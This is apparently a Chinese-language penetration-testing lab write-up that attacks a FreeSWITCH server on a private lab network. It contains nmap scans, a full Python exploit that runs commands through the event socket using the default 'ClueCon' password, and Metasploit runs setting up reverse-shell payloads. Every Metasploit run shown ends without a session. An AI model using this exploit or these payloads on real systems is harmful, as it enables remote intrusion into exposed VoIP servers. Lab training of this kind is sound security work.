套路的先看看開了哪些port,再針對那些port做詳細掃描:
┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.105
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 03:24 EST
Nmap scan report for 172.16.1.105
Host is up (0.056s latency).
Not shown: 65513 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2855/tcp open msrp
2856/tcp open cesdinv
3306/tcp open mysql
5060/tcp open sip
5066/tcp open stanag-5066
5080/tcp open onscreen
5985/tcp open wsman
7443/tcp open oracleas-https
8021/tcp open ftp-proxy
8081/tcp open blackice-icecap
8082/tcp open blackice-alerts
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 32.61 seconds
┌──(root㉿kali)-[~]
└─# nmap -p135,139,445,2855,2856,3306,5060,5066,5080,5985,7443,8021,8081,8082,47001,49152-49158 172.16.1.105 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-11 03:26 EST
Nmap scan report for 172.16.1.105
Host is up (0.018s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2855/tcp open msrp?
2856/tcp open ssl/cesdinv?
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2020-08-24T03:07:10
|_Not valid after: 1984-06-30T20:38:54
|_ssl-date: TLS randomness does not represent time
3306/tcp open mysql?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, NULL, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
|_ Host '192.168.200.7' is not allowed to connect to this MariaDB server
5060/tcp open sip-proxy FreeSWITCH mod_sofia 1.10.1~64bit
|_sip-methods: INVITE, ACK, BYE, CANCEL, OPTIONS, MESSAGE, INFO, UPDATE, REGISTER, REFER, NOTIFY, PUBLISH, SUBSCRIBE
5066/tcp open websocket (WebSocket version: 13)
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad Request
|_ Sec-WebSocket-Version: 13
5080/tcp open sip-proxy FreeSWITCH mod_sofia 1.10.1~64bit
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7443/tcp open ssl/websocket (WebSocket version: 13)
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2020-08-24T03:07:10
|_Not valid after: 1984-06-30T20:38:54
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad Request
|_ Sec-WebSocket-Version: 13
8021/tcp open freeswitch-event FreeSWITCH mod_event_socket
8081/tcp open websocket (WebSocket version: 13)
| fingerprint-strings:
| GenericLines, GetRequest, HTTPOptions:
| HTTP/1.1 400 Bad Request
|_ Sec-WebSocket-Version: 13
8082/tcp open ssl/websocket (WebSocket version: 13)
| fingerprint-strings:
| GenericLines, RTSPRequest:
| HTTP/1.1 400 Bad Request
|_ Sec-WebSocket-Version: 13
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=FreeSWITCH/countryName=US
| Not valid before: 2020-08-24T03:07:10
|_Not valid after: 1984-06-30T20:38:54
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3306-TCP:V=7.93%I=7%D=3/11%Time=640C3B54%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLin
SF:es,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest
SF:,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,
SF:4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,4
SF:C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,4C,"H
SF:\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allowed\x20
SF:to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersionBindReqT
SF:CP,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusR
SF:equestTCP,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not
SF:\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Hel
SF:p,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SSLSessionR
SF:eq,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TerminalSe
SF:rverCookie,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(TL
SF:SSessionReq,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20n
SF:ot\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(K
SF:erberos,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(SMBPr
SF:ogNeg,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(X11Prob
SF:e,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.200\.7'\x20is\x20not\x20allo
SF:wed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5066-TCP:V=7.93%I=7%D=3/11%Time=640C3B55%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-Vers
SF:ion:\x2013\r\n\r\n")%r(GetRequest,37,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\nSec-WebSocket-Version:\x2013\r\n\r\n")%r(HTTPOptions,37,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7443-TCP:V=7.93%T=SSL%I=7%D=3/11%Time=640C3B68%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-
SF:Version:\x2013\r\n\r\n")%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x20
SF:Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n")%r(HTTPOptions,37,"HTT
SF:P/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n
SF:");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8081-TCP:V=7.93%I=7%D=3/11%Time=640C3B55%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocket-Versio
SF:n:\x2013\r\n\r\n")%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\nSec-WebSocket-Version:\x2013\r\n\r\n")%r(HTTPOptions,37,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8082-TCP:V=7.93%T=SSL%I=7%D=3/11%Time=640C3B68%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,37,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSec-WebSocke
SF:t-Version:\x2013\r\n\r\n")%r(RTSPRequest,37,"HTTP/1\.1\x20400\x20Bad\x2
SF:0Request\r\nSec-WebSocket-Version:\x2013\r\n\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (94%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (94%), Microsoft Windows Server 2012 R2 (94%), Tomato 1.27 - 1.28 (Linux 2.4.20) (91%), Microsoft Windows 7 Professional (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 or 2008 Beta 3 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-03-11T08:30:38
|_ start_date: 2021-05-28T17:04:49
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WIN-FH0N2VGINDJ, NetBIOS user: <unknown>, NetBIOS MAC: 00155d2de792 (Microsoft)
| smb2-security-mode:
| 302:
|_ Message signing enabled but not required
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 60.68 ms 192.168.200.1
2 11.27 ms 172.16.1.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.29 seconds
看到freeswitch,就找一下::
exploit-db:
上面網頁的底下是python檔,所以編輯後執行,但好像沒用?
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim freeswitch.py
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# chmod +x freeswitch.py
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ./freeswitch.py 172.16.1.105 whoami
./freeswitch.py: 12: from: not found
./freeswitch.py: 13: import: not found
./freeswitch.py: 15: Syntax error: word unexpected (expecting ")")
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python freeswitch.py 172.16.1.105 whoami
Authenticated
Content-Type: api/response
Content-Length: 23
python檔的內容如下:
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#
#!/usr/bin/python3
from socket import *
import sys
if len(sys.argv) != 3:
print('Missing arguments')
print('Usage: freeswitch-exploit.py <target> <cmd>')
sys.exit(1)
ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH
s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))
response = s.recv(1024)
if b'auth/request' in response:
s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
response = s.recv(1024)
if b'+OK accepted' in response:
print('Authenticated')
s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
response = s.recv(8096).decode()
print(response)
else:
print('Authentication failed')
sys.exit(1)
else:
print('Not prompted for authentication, likely not vulnerable')
sys.exit(1)
再看看有沒有別的poc:
第一個CVE太新了,看看第二個:
根據上面網頁,就是用metaspolit:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# msfconsole
______________________________________
/ it looks like you're trying to run a \
\ module /
--------------------------------------
\
\
__
/ \
| |
@ @
| |
|| |/
|| ||
|\_/|
\___/
=[ metasploit v6.3.2-dev ]
+ -- --=[ 2290 exploits - 1201 auxiliary - 409 post ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Set the current module's RHOSTS with
database values using hosts -R or services
-R
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search freeswitch
Matching Modules
================
# Name Disclosure Dat e Rank Check Description
- ---- -------------- - ---- ----- -----------
0 exploit/multi/misc/freeswitch_event_socket_cmd_exec 2019-11-03 excellent Yes FreeSWITCH Event Socket Command Execution
1 auxiliary/scanner/misc/freeswitch_event_socket_login normal Yes FreeSWITCH Event Socket Login
2 exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec 2019-06-06 excellent Yes FusionPBX Operator Panel exec.php Command Execution
Interact with a module by name or index. For example info 2, use 2 or use exploi t/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec
msf6 > use 0
[*] Using configured payload cmd/unix/reverse
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show options
Module options (exploit/multi/misc/freeswitch_event_socket_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD ClueCon yes FreeSWITCH event socket password
RHOSTS yes The target host(s), see https://docs.metasploit.com/do
cs/using-metasploit/basics/using-metasploit.html
RPORT 8021 yes The target port (TCP)
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
URIPATH no The URI to use for this exploit (default is random)
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to l
isten on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Unix (In-Memory)
View the full module info with the info, or info -d command.
要注意我們想打的是windows的,所以這裡的Exploit target不對,看看能不能改:
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show targets
Exploit targets:
=================
Id Name
-- ----
=> 0 Unix (In-Memory)
1 Linux (Dropper)
2 PowerShell (In-Memory)
3 Windows (In-Memory)
4 Windows (Dropper)
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 2
target => 2
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show options
Module options (exploit/multi/misc/freeswitch_event_socket_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD ClueCon yes FreeSWITCH event socket password
RHOSTS yes The target host(s), see https://docs.metasploit.com/do
cs/using-metasploit/basics/using-metasploit.html
RPORT 8021 yes The target port (TCP)
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
URIPATH no The URI to use for this exploit (default is random)
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to l
isten on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, no
ne)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
2 PowerShell (In-Memory)
View the full module info with the info, or info -d command.
把target設成windows的power shell。
要注意現在是跳vpn,所以lhost要以上圖為準:
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set rhosts 172.16.1.105
rhosts => 172.16.1.105
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lhost 192.168.200.6
lhost => 192.168.200.6
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lport 8080
lport => 8080
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show options
Module options (exploit/multi/misc/freeswitch_event_socket_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD ClueCon yes FreeSWITCH event socket password
RHOSTS 172.16.1.105 yes The target host(s), see https://docs.metasploit.com/do
cs/using-metasploit/basics/using-metasploit.html
RPORT 8021 yes The target port (TCP)
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
URIPATH no The URI to use for this exploit (default is random)
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to l
isten on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, no
ne)
LHOST 192.168.200.6 yes The listen address (an interface may be specified)
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
2 PowerShell (In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.200.6:8080
[*] 172.16.1.105:8021 - Login success
[*] 172.16.1.105:8021 - Sending payload (323 bytes) ...
[*] Exploit completed, but no session was created.
payload有丟成功,但是爛掉了。可能是因為這漏洞被觸發的當下只能觸發一次,如果觸發到不該觸發的東西就爛掉了。
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 3
target => 3
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show options
Module options (exploit/multi/misc/freeswitch_event_socket_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD ClueCon yes FreeSWITCH event socket password
RHOSTS 172.16.1.105 yes The target host(s), see https://docs.metasploit.com/do
cs/using-metasploit/basics/using-metasploit.html
RPORT 8021 yes The target port (TCP)
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
URIPATH no The URI to use for this exploit (default is random)
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to l
isten on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/windows/reverse_powershell):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.200.6 yes The listen address (an interface may be specified)
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
3 Windows (In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.200.6:8080
[*] 172.16.1.105:8021 - Login success
[*] 172.16.1.105:8021 - Sending payload (4305 bytes) ...
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 4
target => 4
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > show options
Module options (exploit/multi/misc/freeswitch_event_socket_cmd_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD ClueCon yes FreeSWITCH event socket password
RHOSTS 172.16.1.105 yes The target host(s), see https://docs.metasploit.com/do
cs/using-metasploit/basics/using-metasploit.html
RPORT 8021 yes The target port (TCP)
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly
generated)
URIPATH no The URI to use for this exploit (default is random)
When CMDSTAGER::FLAVOR is one of auto,certutil,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This
must be an address on the local machine or 0.0.0.0 to l
isten on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, no
ne)
LHOST 192.168.200.6 yes The listen address (an interface may be specified)
LPORT 8080 yes The listen port
Exploit target:
Id Name
-- ----
4 Windows (Dropper)
View the full module info with the info, or info -d command.
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.200.6:8080
[*] 172.16.1.105:8021 - Login success
[*] 172.16.1.105:8021 - Sending payload (323 bytes) ...
[-] 172.16.1.105:8021 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
[*] Exploit completed, but no session was created.
再去設定不同target,如3(windows in memory)跟4(windows dropper),windows dropper顯示SRVPORT 8080 yes The local port to listen on.代表被占用。
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set lport 7070
lport => 7070
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.200.6:7070
[*] 172.16.1.105:8021 - Login success
[*] 172.16.1.105:8021 - Sending payload (323 bytes) ...
[*] 172.16.1.105:8021 - Using URL: http://192.168.200.6:8080/Qxac3iJkY
[*] 172.16.1.105:8021 - Command Stager progress - 100.00% done (115/115 bytes)
[*] 172.16.1.105:8021 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > set target 2
target => 2
msf6 exploit(multi/misc/freeswitch_event_socket_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.200.6:7070
[*] 172.16.1.105:8021 - Login success
[*] 172.16.1.105:8021 - Sending payload (323 bytes) ...
[*] Exploit completed, but no session was created.
換port跟換target都沒用,換下一題好了。
架構)_@PefyLi_https://static.coderbridge.com/images/covers/default-post-cover-3.jpg)
